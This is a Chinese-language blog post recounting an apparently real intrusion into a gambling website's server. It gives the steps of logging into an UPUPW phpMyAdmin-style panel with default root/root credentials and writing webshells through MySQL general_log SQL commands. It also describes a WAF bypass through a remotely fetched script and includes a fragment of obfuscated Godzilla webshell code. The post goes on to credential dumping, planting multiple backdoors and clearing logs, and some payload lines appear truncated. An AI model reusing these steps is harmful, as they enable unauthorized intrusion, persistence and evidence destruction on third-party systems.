实战|简单绕过waf拿下赌博网站

确定目标

图片

收集信息

x.x.x.x

首先常规测试方法一顿怼,目录扫描,端口扫描,js文件,中间件,指纹识别,反正该上的都上。。。

随手加个路径,报错了,当看到这个界面我瞬间就有思路了

图片

为什么这么说呢,因为之前我就碰见过这样的网站报错,这是一个php集成环境,叫upupw,跟phpstudy是一样的

upupw  --> pmd

phpstudy --> phpmyadmin

突破点

这个集成环境包也有个phpinfo的页面,跟数据库管理界面

u.php

图片

 

测试一下弱口令

root/root

图片

 

连接成功后就可以看到phpinfo的页面

图片

好了现在问题变成phpmyadmin拿shell

图片

getshell

三步拿shell

set global general_log='on';
SET global
general_log_file='D:/xxxx/WWW/cmd.php'
SELECT '';

当执行第三步的时候页面卡在执行中。。。没有反应 瞬间感觉不对,可能存在waf

换了个免杀马试试,先写到txt里边看看成功与否

图片

没有任何问题,下面直接写入php文件

图片

 

可以写入,直接去连接shell

图片

果然有waf,当时写入的时候就感觉到了,不免杀的shell,sql语句执行不了

绕过waf

怼了半天都不知道是什么鬼waf,用下载文件试试
为了避免拦截php代码的waf,我这里远程下载的脚本是利用JavaScript转写php

SET global general_log_file='C:/Users/Administrator/Desktop/UPUPW_AP5.5_64/htdocs/11.php';
SELECT ''

图片

访问11.php 就会生成shell.php
这里的shell也是用了哥斯拉的免杀shell

nvoke($A[0]);echo substr(md5($P.$T), 0, 16);echo Q(E(@run($F),$T));echo substr(md5($P.$T), 16);} else {$_SESSION[$V]=$F;}}

图片

尝试了这么多次

图片

图片

进程里没有waf进程

权限是system

图片

脱源码

上传抓密码工具,直接获取管理密码,登上服务器

图片

 

图片

 

图片

留后门,清理痕迹

多留几个后门,万一被删

图片

图片

 

这个网段还有这么多机器

图片

源码

打开源码才发现waf是360webscan

 

 

图片


本文来自互联网用户投稿,文章观点仅代表作者本人,不代表本站立场,不承担相关法律责任。如若转载,请注明出处。 如若内容造成侵权/违法违规/事实不符,请点击【内容举报】进行投诉反馈!

相关文章

立即
投稿

微信公众账号

微信扫一扫加关注

返回
顶部